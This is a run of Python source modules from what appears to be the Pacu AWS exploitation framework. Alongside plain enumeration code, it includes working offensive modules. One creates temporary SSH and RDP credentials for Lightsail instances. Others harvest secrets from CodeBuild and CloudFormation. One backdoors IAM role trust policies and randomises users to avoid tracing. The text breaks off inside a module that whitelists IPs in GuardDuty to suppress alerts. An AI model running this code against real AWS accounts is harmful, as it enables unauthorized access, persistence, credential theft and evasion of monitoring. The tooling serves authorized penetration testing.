    session = pacu_main.get_active_session()

    args = parser.parse_args(args)
    print = pacu_main.print

    get_regions = pacu_main.get_regions
    if not args.regions:
        regions = get_regions('elasticloadbalancing')
    else:
        regions = args.regions.split(',')
    summary_data = {'load_balancers': 0}
    if 'LoadBalancers' not in session.EC2.keys():
        ec2_data = deepcopy(session.EC2)
        ec2_data['LoadBalancers'] = []
        session.update(pacu_main.database, EC2=ec2_data)

    load_balancers = list()
    for region in regions:
        print('Starting region {}...'.format(region))
        client = pacu_main.get_boto3_client('elbv2', region)

        count = 0
        response = None
        next_marker = False

        while (response is None or 'NextMarker' in response):
            try:
                if next_marker is False:
                    response = client.describe_load_balancers()
                else:
                    response = client.describe_load_balancers(Marker=next_marker)

                if 'NextMarker' in response:
                    next_marker = response['NextMarker']
                for load_balancer in response['LoadBalancers']:
                    load_balancer['Region'] = region
                    # Adding Attributes to current load balancer database
                    load_balancer['Attributes'] = client.describe_load_balancer_attributes(
                        LoadBalancerArn=load_balancer['LoadBalancerArn']
                    )['Attributes']
                    load_balancers.append(load_balancer)
            except ClientError as error:
                if error.response['Error']['Code'] == 'AccessDenied':
                    print('  FAILURE: MISSING REQUIRED AWS PERMISSIONS')
                else:
                    print('  {}'.format(error.response['Error']['Code']))
                break
            if response and 'LoadBalancers' in response:
                count += len(response['LoadBalancers'])
        summary_data['load_balancers'] += count
        print('  {} load balancer(s) found '.format(count))

    ec2_data = deepcopy(session.EC2)
    ec2_data['LoadBalancers'] = deepcopy(load_balancers)
    session.update(pacu_main.database, EC2=ec2_data)

    print('\n{} total load balancer(s) found.'.format(len(session.EC2['LoadBalancers'])))

    now = time.time()
    p = 'elbs_no_logs_{}.csv'.format(now)
    summary_data['csv_file_path'] = p
    summary_data['logless'] = 0

    with save(p, 'w+') as f:
        f.write('Load Balancer Name,Load Balancer ARN,Region\n')
        for load_balancer in session.EC2['LoadBalancers']:
            for attribute in load_balancer['Attributes']:
                if attribute['Key'] == 'access_logs.s3.enabled':
                    if attribute['Value'] is False or attribute['Value'] == 'false':
                        f.write('{},{},{}\n'.format(
                            load_balancer['LoadBalancerName'], load_balancer['LoadBalancerArn'], load_balancer['Region'])
                        )
                        summary_data['logless'] += 1
    return summary_data


def summary(data, pacu_main: 'Main'):
    out = '  {} Load balancer(s) have been found\n'.format(data['load_balancers'])
    if data['logless'] > 0:
        out += '  {} Load balancer(s) found without logging\n'.format(data['logless'])
        out += '  List of Load balancers without logging saved to:\n    {}\n'.format(data['csv_file_path'])
    return out



import contextlib
import io
import os
from typing import Optional, cast, Callable, Generator, IO, Any

from pathlib import Path

from pacu import settings

get_active_session: Optional[Callable] = None


def strip_lines(text: str) -> str:
    out = []
    for line in text.splitlines():
        out.append(line.strip('\t '))
    return ' '.join(out)


def home_dir() -> Path:
    return settings.home_dir


def session_dir() -> Path:
    if not get_active_session:
        raise UserWarning("No session_name set.")
    p = (home_dir() / cast(Callable, get_active_session)().name).absolute()
    os.makedirs(p, exist_ok=True)
    return p


def downloads_dir() -> Path:
    p = (session_dir() / 'downloads').absolute()
    os.makedirs(p, exist_ok=True)
    return p


@contextlib.contextmanager
def save(file_name: str, mode: str = 'w', header: Optional[str] = None, **kwargs) -> Generator[IO[Any], None, None]:
    """Saves the contents of text to {pacu_home}/{session}/downloads/{file_name}.

    Use append to avoid overwriting existing content.
    Setting the header will write the value to the first line if the file doesn't already exist.
        Used for CSV headers.

    By default the home directory is ~/.pacu.
    """
    p = Path(downloads_dir()) / file_name
    p.parent.mkdir(parents=True, exist_ok=True, mode=0o700)

    with open(str(p), mode, **kwargs) as f:
        if header and not p.exists():
            f.write(header + '\n')
        try:
            yield f
        finally:
            f.close()



#!/usr/bin/env python3
import argparse
from botocore.exceptions import ClientError
import os

from pacu.core.lib import downloads_dir

module_info = {
    # Name of the module (should be the same as the filename)
    'name': 'lightsail__generate_temp_access',

    # Name and any other notes about the author
    'author': 'Alexander Morgenstern alexander.morgenstern@rhinosecuritylabs.com',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'EXPLOIT',

    # One liner description of the module functionality. This shows up when a user searches for modules.
    'one_liner': 'Creates temporary SSH keys for available instances in AWS Lightsail.',

    # Full description about what the module does and how it works
    'description': 'This module creates temporary SSH keys that can be used to connect to Lightsail instances, and downloads them into the session\'s download directory.',

    # A list of AWS services that the module utilizes during its execution
    'services': ['Lightsail'],

    # For prerequisite modules, try and see if any existing modules return the data that is required for your module before writing that code yourself, that way, session data can stay separated and modular.
    'prerequisite_modules': ['lightsail__enum'],

    # External resources that the module depends on. Valid options are either a GitHub URL (must end in .git) or single file URL.
    'external_dependencies': [],

    # Module arguments to autocomplete when the user hits tab
    'arguments_to_autocomplete': ['--instances', '--regions'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--instances', required=False, help='One or more Lightsail instance names, their regions, and their access protocol in the format instanceid@region@protocol. Windows instances will use the RDP protocol, and others use SSH. Defaults to all instances.')
parser.add_argument('--regions', required=False, default=None, help='One or more (comma separated) AWS regions in the format us-east-1. Defaults to all session regions.')


def write_keys_to_file(created_keys, session):
    for region in created_keys:
        ssh_key_dir = os.path.join(downloads_dir(), module_info['name'], region)
        if not os.path.exists(ssh_key_dir):
            os.makedirs(ssh_key_dir)
        for credential in created_keys[region]:
            if credential['protocol'] == 'rdp':
                windows_file_dir = os.path.join(ssh_key_dir, credential['instanceName'])
                try:
                    with open(windows_file_dir, 'w') as windows_file:
                        # Create header for file.
                        windows_file.write('instanceName,ipAddress,username,password\n')

                        windows_file.write(credential['instanceName'] + ',')
                        windows_file.write(credential['ipAddress'] + ',')
                        windows_file.write(credential['username'] + ',')
                        windows_file.write(credential['password'] + '\n')
                except IOError:
                    print('Error writing credential file for {}.'.format(credential['instanceName']))
                    continue
            else:
                private_key_file_dir = os.path.join(ssh_key_dir, credential['instanceName'])
                cert_key_file_dir = os.path.join(ssh_key_dir, credential['instanceName'] + '-cert.pub')
                try:
                    with open(private_key_file_dir, 'w') as private_key_file:
                        private_key_file.write(credential['privateKey'])
                    with open(cert_key_file_dir, 'w') as cert_key_file:
                        cert_key_file.write(credential['certKey'])
                except IOError:
                    print('Error writing credential file for {}.'.format(credential['instanceName']))
                    continue


def main(args, pacu_main):
    session = pacu_main.get_active_session()
    print = pacu_main.print
    get_regions = pacu_main.get_regions
    fetch_data = pacu_main.fetch_data

    args = parser.parse_args(args)
    regions = args.regions.split(',') if args.regions else get_regions('lightsail')
    instances = []

    if args.instances is not None:  # need to update this to include the regions of these IDs
        for instance in args.instances.split(','):
            instance_name = instance.split('@')[0]
            region = instance.split('@')[1]
            protocol = instance.split('@')[2]
            if region not in regions:
                print('  {} is not a valid region'.format(region))
                continue
            else:
                instances.append({
                    'name': instance_name,
                    'protocol': protocol,
                    'region': region,
                })
    else:
        print('Targeting all Lightsail instances...')
        if fetch_data(['Lightsail'], module_info['prerequisite_modules'][0], '--instances') is False:
            print('Pre-req module not run successfully. Exiting...')
            return
        for instance in session.Lightsail['instances']:
            if instance['region'] in regions:
                protocol = 'rdp' if 'Windows' in instance['blueprintName'] else 'ssh'
                instances.append({
                    'name': instance['name'],
                    'protocol': protocol,
                    'region': instance['region'],
                })

    temp_keys = {}
    for instance in instances:
        temp_keys[instance['region']] = []
    for instance in instances:
        client = pacu_main.get_boto3_client('lightsail', instance['region'])
        print('    Instance {}'.format(instance['name']))
        try:
            response = client.get_instance_access_details(
                instanceName=instance['name'],
                protocol=instance['protocol']
            )
            temp_keys[instance['region']].append(response['accessDetails'])
            print('    Successfully created temporary access for {}'.format(instance['name']))
        except ClientError as error:
            code = error.response['Error']['Code']
            if code == 'AccessDeniedException':
                print('      Unauthorized to generate temporary access.')
                return
            elif code == 'OperationFailureException':
                print('      FAILED: Unable to interact with non-running instance.')
                continue
            else:
                print(error)
            break

    write_keys_to_file(temp_keys, session)

    windows_count = 0
    ssh_count = 0
    for region in temp_keys:
        for credential in temp_keys[region]:
            if credential['protocol'] == 'rdp':
                windows_count += 1
            else:
                ssh_count += 1

    if windows_count or ssh_count:
        written_file_path = os.path.join(downloads_dir(), module_info['name'])
    else:
        written_file_path = None

    summary_data = {
        'windows': windows_count,
        'linux': ssh_count,
        'written_file_path': written_file_path,
    }
    return summary_data


def summary(data, pacu_main):
    out = '  Created temporary access for {} Windows instances.\n'.format(data['windows'])
    out += '  Created temporary access for {} Linux instances.\n'.format(data['linux'])
    if data['written_file_path'] is not None:
        out += '\n  Credential files written to:\n     {}{}'.format(data['written_file_path'], os.path.sep)
    return out



#!/usr/bin/env python3
import argparse
from botocore.exceptions import ClientError
from copy import deepcopy
from random import choice

module_info = {
    # Name of the module (should be the same as the filename).
    'name': 'ecs__enum',

    # Name and any other notes about the author.
    'author': 'Nicholas Spagnola from Rhino Security Labs',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'ENUM',

    # One liner description of the module functionality. This shows up when a
    # user searches for modules.
    'one_liner': 'This module enumerates information from ECS',

    # Full description about what the module does and how it works.
    'description': 'This module enumerates available information from ECS',

    # A list of AWS services that the module utilizes during its execution.
    'services': ['ECS'],

    # For prerequisite modules, try and see if any existing modules return the
    # data that is required for your module before writing that code yourself;
    # that way, session data can stay separated and modular.
    'prerequisite_modules': [],

    # External resources that the module depends on. Valid options are either
    # a GitHub URL (must end in .git), or a single file URL.
    'external_dependencies': [],

    # Module arguments to autocomplete when the user hits tab.
    'arguments_to_autocomplete': [
        '--clusters',
        '--attributes',
        '--services',
        '--taskdef',
        '--regions'
    ],
}

# Every module must include an ArgumentParser named "parser", even if it
# doesn't use any additional arguments.
parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--clusters', required=False, action='store_true', default=False, help='Enumerate ECS Clusters')
parser.add_argument('--containers', required=False, action='store_true', default=False, help='Enumerate ECS Containers')
parser.add_argument('--services', required=False, action='store_true', default=False, help='Enumerate ECS Services')
parser.add_argument('--taskdef', required=False, action='store_true', default=False, help='Enumerate ECS Task Defintions')
parser.add_argument('--regions', required=False, default=None, help='One or more (comma separated) AWS regions in the format "us-east-1". Defaults to all session regions.')

ARG_FIELD_MAPPER = {
    'clusters': 'Clusters',
    'containers': 'Containers',
    'services': 'Services',
    'taskdef': 'TaskDefinitions'
}

def main(args, pacu_main):
    args = parser.parse_args(args)
    print = pacu_main.print
    session = pacu_main.get_active_session()
    get_regions = pacu_main.get_regions

    if args.regions is None:
        regions = get_regions('ecs')
        if regions is None or regions == [] or regions == '' or regions == {}:
            print('This module is not supported in any regions specified in the current sessions region set. Exiting...')
            return
    else:
        regions = args.regions.split(',')
    
    all_clusters = []
    all_containers = []
    all_services = []
    all_task_defs = []

    if args.clusters is False and args.containers is False and args.services is False and args.taskdef is False:
        args.taskdef = args.services = args.containers = args.clusters = True

    for region in regions:
        clusters = []
        containers = []
        services = []
        task_defs = []

        
        if any([args.clusters, args.containers, args.services, args.taskdef]):
            print('Starting region {}...'.format(region))
        
        client = pacu_main.get_boto3_client('ecs', region)

        if args.clusters:
            response = None
            #next_token = False
            while (response is None):# or 'NextToken' in response):
                #if next_token is False:
                try:
                    response = client.list_clusters()
                except ClientError as error:
                    code = error.response['Error']['Code']
                    print('FAILURE: ')
                    if code == 'UnauthorizedOperation':
                        print('  Access denied to ListClusters.')
                    else:
                        print('  ' + code)
                    print('    Skipping cluster enumeration...')
                        
                else:
                    response = client.list_clusters()

                for arn in response['clusterArns']:
                    clusters.append(arn)
            print('  {} cluster arn(s) found.'.format(len(clusters)))
            all_clusters += clusters

        if args.containers:
            for cluster_arn in clusters:
                response = None
                next_token = False
                while (response is None or 'NextToken' in response):
                    if next_token is False:
                        try:
                            response = client.list_container_instances(
                                cluster=cluster_arn,
                                maxResults=100  # To prevent timeouts if there are too many instances
                            )
                        except ClientError as error:
                            code = error.response['Error']['Code']
                            print('FAILURE: ')
                            if code == 'UnauthorizedOperation':
                                print('  Access denied to ListContainerInstances.')
                            else:
                                print('  ' + code)
                            print('  Skipping container enumeration...')
                            args.containers = False
                            break
                    else:
                        response = client.list_container_instances(
                            cluster=cluster_arn,
                            maxResults=100,
                            nextToken=next_token
                        )
                    if 'NextToken' in response:
                        next_token = response['NextToken']
                
                    for container in response['containerInstanceArns']:
                        containers.append(container)
            
            print('  {} container(s) found.'.format(len(containers)))
            all_containers += containers

        if args.services:
            for cluster_arn in clusters:
                response = None
                next_token = False
                while (response is None or 'NextToken' in response):
                    if next_token is False:
                        try:
                            response = client.list_services(
                                cluster=cluster_arn,
                                maxResults=100  # To prevent timeouts if there are too many instances
                            )
                        except ClientError as error:
                            code = error.response['Error']['Code']
                            print('FAILURE: ')
                            if code == 'UnauthorizedOperation':
                                print('  Access denied to ListServices.')
                            else:
                                print('  ' + code)
                            print('  Skipping instance enumeration...')
                            args.services = False
                            break
                    else:
                        response = client.list_services(
                            cluster=cluster_arn,
                            maxResults=100,
                            nextToken=next_token
                        )
                    if 'nextToken' in response:
                        next_token = response['nextToken']
                    for service_arns in response['serviceArns']:
                        services.append(service_arns)

            print('  {} service(s) found.'.format(len(services)))
            all_services += services

        if args.taskdef:
            response = None
            next_token = False
            while (response is None or 'nextToken' in response):
                if next_token is False:
                    try:
                        response = client.list_task_definitions(
                            maxResults=100  # To prevent timeouts if there are too many instances
                        )
                    except ClientError as error:
                        code = error.response['Error']['Code']
                        print('FAILURE: ')
                        if code == 'UnauthorizedOperation':
                            print('  Access denied to ListTaskDefinitions.')
                        else:
                            print('  ' + code)
                        print('  Skipping instance enumeration...')
                        args.taskdef = False
                        break
                else:
                    response = client.list_task_definitions(
                        maxResults=100,
                        nextToken=next_token
                    )
                if 'nextToken' in response:
                    next_token = response['nextToken']
                for task_def in response['taskDefinitionArns']:
                    task_defs.append(task_def)

            print('  {} task definition(s) found.'.format(len(task_defs)))
            all_task_defs += task_defs

    gathered_data = {
        'Clusters': all_clusters,
        'Containers': all_containers,
        'Services': all_services,
        'TaskDefinitions': all_task_defs
    }

    for var in vars(args):
        if var == 'regions':
            continue
        if not getattr(args, var):
            del gathered_data[ARG_FIELD_MAPPER[var]]

    ecs_data = deepcopy(session.ECS)
    for key, value in gathered_data.items():
        ecs_data[key] = value
    session.update(pacu_main.database, ECS=ecs_data)    


    gathered_data['regions'] = regions

    if any([args.clusters,args.containers,args.services,args.taskdef]):
        return gathered_data
    else:
        print('No data successfully enumerated.\n')
        return None


def summary(data, pacu_main):
    results = []

    results.append('  Regions:')
    for region in data['regions']:
        results.append('     {}'.format(region))

    results.append('')

    if 'Clusters' in data:
        results.append('    {} total cluster(s) found.'.format(len(data['Clusters'])))

    if 'Containers' in data:
        results.append('    {} total container(s) found.'.format(len(data['Containers'])))

    if 'Services' in data:
        results.append('    {} total service(s) found.'.format(len(data['Services'])))

    if 'TaskDefinitions' in data:
        results.append('    {} total task definition(s) found.'.format(len(data['TaskDefinitions'])))

    return '\n'.join(results)



    



#!/usr/bin/env python3
import argparse
from copy import deepcopy
from botocore.exceptions import ClientError


module_info = {
    'name': 'codebuild__enum',
    'author': 'Spencer Gietzen of Rhino Security Labs',
    'category': 'ENUM',
    'one_liner': 'Enumerates CodeBuild builds and projects while looking for sensitive data',
    'description': 'This module enumerates all CodeBuild builds and projects, with the goal of finding sensitive information in the environment variables associated with each one, like passwords, secrets, or API keys.',
    'services': ['CodeBuild'],
    'prerequisite_modules': [],
    'external_dependencies': [],
    'arguments_to_autocomplete': ['--regions', '--builds', '--projects'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--regions', required=False, default=None, help='One or more (comma separated) AWS regions in the format "us-east-1". Defaults to all session regions.')
parser.add_argument('--builds', required=False, default=False, action='store_true', help='Enumerate builds. If this is passed in without --projects, then only builds will be enumerated. By default, both are enumerated.')
parser.add_argument('--projects', required=False, default=False, action='store_true', help='Enumerate projects. If this is passed in without --builds, then only projects will be enumerated. By default, both are enumerated.')


def main(args, pacu_main):
    session = pacu_main.get_active_session()

    args = parser.parse_args(args)
    print = pacu_main.print
    get_regions = pacu_main.get_regions

    if args.builds is False and args.projects is False:
        enum_all = True
    else:
        enum_all = False
    regions = args.regions.split(',') if args.regions else get_regions('CodeBuild')

    all_projects = []
    all_builds = []
    environment_variables = []
    summary_data = {}
    for region in regions:
        region_projects = []
        region_builds = []
        summary_data[region] = {}

        print('Starting region {}...'.format(region))
        client = pacu_main.get_boto3_client('codebuild', region)

        # Begin enumeration

        # Projects
        if enum_all is True or args.projects is True:
            project_names = []
            response = {}
            try:
                response = client.list_projects()
                project_names.extend(response['projects'])
                while 'nextToken' in response:
                    response = client.list_projects(
                        nextToken=response['nextToken']
                    )
                    project_names.extend(response['projects'])
    
                if len(project_names) > 0:
                    region_projects = client.batch_get_projects(
                        names=project_names
                    )['projects']
                    print('Found {} projects'.format(len(region_projects)))
                    summary_data[region]['Projects'] = len(region_projects)
                    all_projects.extend(region_projects)
            except ClientError as error:
                if error.response['Error']['Code'] == 'AccessDeniedException':
                    print('No projects got for region: {} - AccessDeniedException'.format(region))
                    print('ClientError getting projects: {}'.format(error))


        # Builds
        if enum_all is True or args.builds is True:
            build_ids = []
            response = {}
            try:
                response = client.list_builds()
                build_ids.extend(response['ids'])
            except ClientError as error:
               if error.response['Error']['Code'] == 'AccessDeniedException':
                   print('No code-builds builds got for region: {} - AccessDeniedException'.format(region))
                   print('ClientError getting builds: {}'.format(error))

               
            while 'nextToken' in response:
                response = {}
                try:
                    response = client.list_builds(
                        nextToken=response['nextToken']
                    )
                    build_ids.extend(response['ids'])
                except ClientError as error:
                    if error.response['Error']['Code'] == 'AccessDeniedException':
                        print('No further code-builds builds for region: {} - AccessDeniedException'.format(region))
                        print('ClientError getting further builds: {}'.format(error))

            if len(build_ids) > 0:
                region_builds = {}
                try:
                    region_builds = client.batch_get_builds(
                        ids=build_ids
                    )['builds']
                    print('  Found {} builds'.format(len(region_builds)))
                    summary_data[region]['Builds'] = len(region_builds)
                    all_builds.extend(region_builds)
                except ClientError as error:
                    if error.response['Error']['Code'] == 'AccessDeniedException':
                        print('No info retrieved about code-builds for region: {} - AccessDeniedException'.format(region))
                        print('ClientError getting info about builds: {}'.format(error))

        if not summary_data[region]:
            del summary_data[region]

    # Begin environment variable dump

    # Projects
    for project in all_projects:
        if 'environment' in project and 'environmentVariables' in project['environment']:
            environment_variables.extend(project['environment']['environmentVariables'])

    # Builds
    for build in all_builds:
        if 'environment' in build and 'environmentVariables' in build['environment']:
            environment_variables.extend(build['environment']['environmentVariables'])

    # Store in session
    codebuild_data = deepcopy(session.CodeBuild)
    codebuild_data['EnvironmentVariables'] = environment_variables
    summary_data['All'] = {'EnvironmentVariables': len(environment_variables)}

    if len(all_projects) > 0:
        codebuild_data['Projects'] = all_projects
        summary_data['All']['Projects'] = len(all_projects)

    if len(all_builds) > 0:
        codebuild_data['Builds'] = all_builds
        summary_data['All']['Builds'] = len(all_builds)

    session.update(pacu_main.database, CodeBuild=codebuild_data)

    return summary_data

def summary(data, pacu_main):
    out = ''
    for region in sorted(data):
        out += '    {}\n'.format(region)
        for val in data[region]:
            out += '        {} {} found.\n'.format(data[region][val], val[:-1] + '(' + val[-1] + ')')
    return out



#!/usr/bin/env python3
import argparse
import json
from random import choice

from botocore.exceptions import ClientError


module_info = {
    # Name of the module (should be the same as the filename)
    'name': 'iam__backdoor_assume_role',

    # Name and any other notes about the author
    'author': 'Spencer Gietzen of Rhino Security Labs based on the idea from https://github.com/dagrz/aws_pwn/blob/master/persistence/backdoor_all_roles.py',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'PERSIST',

    # One liner description of the module functionality. This shows up when a user searches for modules.
    'one_liner': 'Creates assume-role trust relationships between users and roles.',

    # Description about what the module does and how it works
    'description': 'This module creates a trust relationship between one or more user accounts and one or more roles in the account, allowing those users to assume those roles.',

    # A list of AWS services that the module utilizes during its execution
    'services': ['IAM'],

    # For prerequisite modules, try and see if any existing modules return the data that is required for your module before writing that code yourself, that way, session data can stay separated and modular.
    'prerequisite_modules': ['iam__enum_users_roles_policies_groups'],

    # Module arguments to autocomplete when the user hits tab
    'arguments_to_autocomplete': ['--role-names', '--user-arns', '--no-random'],
}


parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--role-names', required=False, default=None, help='A comma-separated list of role names from the AWS account that trust relationships should be created with. Defaults to all roles.')
parser.add_argument('--user-arns', required=False, default=None, help='A comma-separated list of user ARNs that the trust relationship with roles should be created with. By default, user ARNs in this list are chosen at random for each role to try and prevent the tracking of the logs all back to one user account. Without this argument, the module will default to the current user.')
parser.add_argument('--no-random', required=False, action='store_true', help='If this argument is supplied in addition to a list of user ARNs, a trust relationship is created for each user in the list with each role, rather than one of them at random.')


def main(args, pacu_main):
    session = pacu_main.get_active_session()

    ###### Don't modify these. They can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print
    input = pacu_main.input
    key_info = pacu_main.key_info
    fetch_data = pacu_main.fetch_data
    get_aws_key_by_alias = pacu_main.get_aws_key_by_alias
    ######

    client = pacu_main.get_boto3_client('iam')

    rolenames = []
    user_arns = []
    summary_data = {}

    if args.role_names is None:
        print('Fetching Roles... ')
        if fetch_data(['IAM', 'Roles'], module_info['prerequisite_modules'][0], '--roles') is False:
            print('Sub-module Execution Failed')
            print('  Exiting...')
            return
        for role in session.IAM['Roles']:
            rolenames.append(role['RoleName'])
        print('{} Role(s) Found'.format(len(session.IAM['Roles'])))
    else:
        rolenames = args.role_names.split(',')

    if args.user_arns is None:
        # Find out the current users ARN
        # This should be moved into the creds array in the "Arn" parameter for those set of keys that are running this module
        user = key_info()
        active_aws_key = get_aws_key_by_alias(session.key_alias)

        if 'Arn' not in user or user['Arn'] is None:
            client = pacu_main.get_boto3_client('sts')
            user_info = client.get_caller_identity()
            active_aws_key.update(pacu_main.database, arn=user_info['Arn'], user_id=user_info['UserId'], account_id=user_info['Account'])

        user_arns.append(active_aws_key.arn)
    else:
        if ',' in args.user_arns:
            user_arns.extend(args.user_arns.split(','))
        else:
            user_arns.append(args.user_arns)  # Only one ARN was passed in

    iam = pacu_main.get_boto3_resource('iam')
    backdoored_role_count = 0
    print('Backdoor the following roles?')
    for rolename in rolenames:
        target_role = 'n'
        if args.role_names is None:
            target_role = input('  {}  (Y/N) '.format(rolename))

        if target_role.lower() == 'y' or args.role_names is not None:
            print('    Backdooring {}...'.format(rolename))
            try:
                role = iam.Role(rolename)
                original_policy = role.assume_role_policy_document
                hacked_policy = modify_assume_role_policy(original_policy, user_arns, args.no_random)
                client.update_assume_role_policy(
                    RoleName=rolename,
                    PolicyDocument=json.dumps(hacked_policy)
                )
                print('    Backdoor successful!')
                backdoored_role_count += 1
            except ClientError as error:
                print('      FAILURE:')
                code = error.response['Error']['Code']
                if code == 'UnmodifiableEntity':
                    print('        SERVICE PROTECTED BY AWS')
                elif code == 'AccessDenied':
                    print('        MISSING NEEDED PERMISSIONS')
                else:
                    print('        {}'.format(code))
    summary_data['RoleCount'] = backdoored_role_count
    return summary_data


def summary(data, pacu_main):
    out = ''
    if 'RoleCount' in data:
        out += '  {} Role(s) successfully backdoored\n'.format(data['RoleCount'])
    return out


def modify_assume_role_policy(original_policy, user_arns, no_random):
    if 'Statement' in original_policy:
        statements = original_policy['Statement']

        for statement in statements:
            if 'Effect' in statement and statement['Effect'] == 'Allow':
                if 'Principal' in statement and isinstance(statement['Principal'], dict):
                    # Principals can be services, federated users, etc.
                    # 'AWS' signals a specific account based resource
                    # print(statement['Principal'])
                    if 'AWS' in statement['Principal']:
                        if isinstance(statement['Principal']['AWS'], list):
                            # If there are multiple principals, append to the list
                            if no_random:
                                for arn in user_arns:
                                    statement['Principal']['AWS'].append(arn)

                            else:
                                arn = choice(user_arns)
                                statement['Principal']['AWS'].append(arn)

                        else:
                            # If a single principal exists, make it into a list
                            statement['Principal']['AWS'] = [statement['Principal']['AWS']]
                            if no_random:
                                for arn in user_arns:
                                    statement['Principal']['AWS'].append(arn)

                            else:
                                arn = choice(user_arns)
                                statement['Principal']['AWS'].append(arn)

                    else:
                        # No account based principal principal exists
                        if no_random and len(user_arns) > 1:
                            statement['Principal']['AWS'] = []
                            for arn in user_arns:
                                statement['Principal']['AWS'].append(arn)

                        else:
                            arn = choice(user_arns)
                            statement['Principal']['AWS'] = arn

                elif 'Principal' not in statement:
                    # This shouldn't be possible, but alas, it is
                    if no_random and len(user_arns) > 1:
                            statement['Principal'] = {'AWS': []}
                            for arn in user_arns:
                                statement['Principal']['AWS'].append(arn)

                    else:
                        arn = choice(user_arns)
                        statement['Principal'] = {'AWS': arn}

    return original_policy  # now modified in line



import math
import json
import re
import os
from typing import Dict, Any

from pathlib import Path


class Color:
    GREEN = '\033[92m'
    BLUE = '\033[94m'
    RED = '\033[91m'
    # noinspection SpellCheckingInspection
    ENDC = '\033[0m'

    @staticmethod
    def print(color, text) -> None:
        print('{}{}{}'.format(color, text, Color.ENDC))


def shannon_entropy(data):
    if not data:
        return 0

    entropy = 0
    for character_i in range(256):
        px = data.count(chr(character_i)) / len(data)
        if px > 0:
            entropy += - px * math.log(px, 2)
    return entropy


def regex_checker(userdata) -> Dict[Any, list]:
    results = {}

    try:
        f = open(Path(__file__).parent/'regexs.json')
        data = f.read()
        regexs = json.loads(data)

        for key in regexs:
            regex = re.compile(regexs[key])
            result = regex.findall(userdata)

            if result:
                results[key] = result

    except Exception as e:
        raise e

    f.close()

    return results


def contains_secret(data, THRESHOLD=3.5) -> bool:
    return shannon_entropy(data) > THRESHOLD



import argparse
from botocore.exceptions import ClientError
import json, os, datetime
from json import JSONEncoder

from pacu.core.lib import downloads_dir, strip_lines
from pacu.core.secretfinder.utils import regex_checker, Color

module_info = {
    'name': 'cloudformation__download_data',
    'author': 'David Yesland',
    'category': 'ENUM',
    'one_liner': 'Downloads all templates, parameters, and exports from CloudFormation Stacks.',
    'description': strip_lines('''
        Downloads all templates, parameters, and exports from CloudFormation Stacks. Looks for secrets in all and saves data
        to files.
    '''),
    'services': [
        'cloudformation'
    ],
    'prerequisite_modules': [],
    'external_dependencies': [],
    'arguments_to_autocomplete': []
}

parser = argparse.ArgumentParser(add_help=False, description=(module_info['description']))

parser.add_argument('--regions', required=False, default=None, help='One or more (comma separated) AWS regions in the format '
                                                                    'us-east-1. Defaults to all regions.')

def main(args, pacu_main):
    session = pacu_main.get_active_session()
    print = pacu_main.print
    get_regions = pacu_main.get_regions
    regions = get_regions('cloudformation')

    def find_secrets(string):
        detections = regex_checker(string)
        [Color.print(Color.GREEN, '\tDetected {}: {}'.format(itemkey, detections[itemkey])) for itemkey in detections]

    def outfile(subdir, filename):
        base_path = downloads_dir()/f"{module_info['name']}/{subdir}/"
        if not os.path.exists(base_path):
            os.makedirs(base_path)
        return open(base_path/filename, 'a+')

    class DateTimeEncoder(JSONEncoder):

        def default(self, obj):
            if isinstance(obj, (datetime.date, datetime.datetime)):
                return obj.isoformat()

    all_stacks = []
    found_regions = []
    for region in regions:
        client = pacu_main.get_boto3_client('cloudformation', region)
        print('Looking for CloudFormation Stacks in region {}...'.format(region))
        stacks_data = client.describe_stacks()
        stacks = stacks_data['Stacks']
        all_stacks += stacks

        if stacks_data['Stacks']:
            print('Getting exports for region: {}'.format(region))
            exports = client.list_exports()
            if exports:
                with outfile('exports', region) as (f):
                    json.dump(exports, f, indent=1)
                find_secrets(json.dumps(exports))
        while 'NextToken' in stacks_data:
            stacks_data = client.describe_stacks(NextToken=(stacks_data['NextToken']))
            stacks += stacks_data['Stacks']

        if stacks_data['Stacks']:
            found_regions.append(region)
            for stack in stacks:
                with outfile('stacks/{}'.format(region), stack['StackId'].replace('/', '-')) as (f):
                    json.dump(stack, f, indent=1, cls=DateTimeEncoder)
                print('Getting template for stack: {}'.format(stack['StackId']))
                find_secrets(json.dumps(stack, cls=DateTimeEncoder))
                try:
                    templates = client.get_template(StackName=(stack['StackId']))
                    with outfile('templates/{}'.format(region), stack['StackId'].replace('/', '-')) as (f):
                        json.dump(templates, f, indent=1)
                except:
                    continue

                find_secrets(json.dumps(templates))

        stacks_data = {}

    return {
        'region_count': len(found_regions),
        'stack_count': len(all_stacks),
        'output_path': downloads_dir()/f"{module_info['name']}/*",
    }


def summary(data, pacu_main):
    number_of_parameters = 0
    if data.keys():
        return 'Downloaded data from {} CloudFormation stacks, from {} region(s).\n        Saved to: {}'.format(
            data['stack_count'], data['region_count'], data['output_path'])
    else:
        return 'No CloudFormation stacks found.'



#!/usr/bin/env python3
import argparse
from botocore.exceptions import ClientError
import copy
import string
import random


module_info = {
    'name': 'guardduty__whitelist_ip',
    'author': 'Spencer Gietzen',
    'category': 'EVADE',
    'one_liner': 'Adds an IP address to the list of trusted IPs in GuardDuty.',
    'description': 'This module accepts a file containing IPv4 addresses and adds them to the GuardDuty list of trusted IPs to basically disable security alerts against these IPs. A remote file location is required for this list, as that is what the GuardDuty API requires. Note: This will not erase any existing GuardDuty findings, it will only prevent future findings related to the included IP addresses. WARNING: Only one list of trusted IP addresses is allowed per GuardDuty detector. This module will prompt you to delete an existing list if you would like, but doing so could have unintended bad consequences on the target AWS environment.',
    'services': ['GuardDuty'],
    'prerequisite_modules': ['detection__enum_services'],
    'external_dependencies': [],
    'arguments_to_autocomplete': ['--path', '--regions', '--targets'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])
parser.add_argument('--path', required=True, help='A public link to a file containing a list of IP addresses to whitelist (such as an object in an S3 bucket). This link must stay online/public for as long as you want the IP list whitelisted.')
parser.add_argument('--regions', required=False, default=None, help='The set of regions to target GuardDuty detectors in (defaults to all session regions).')
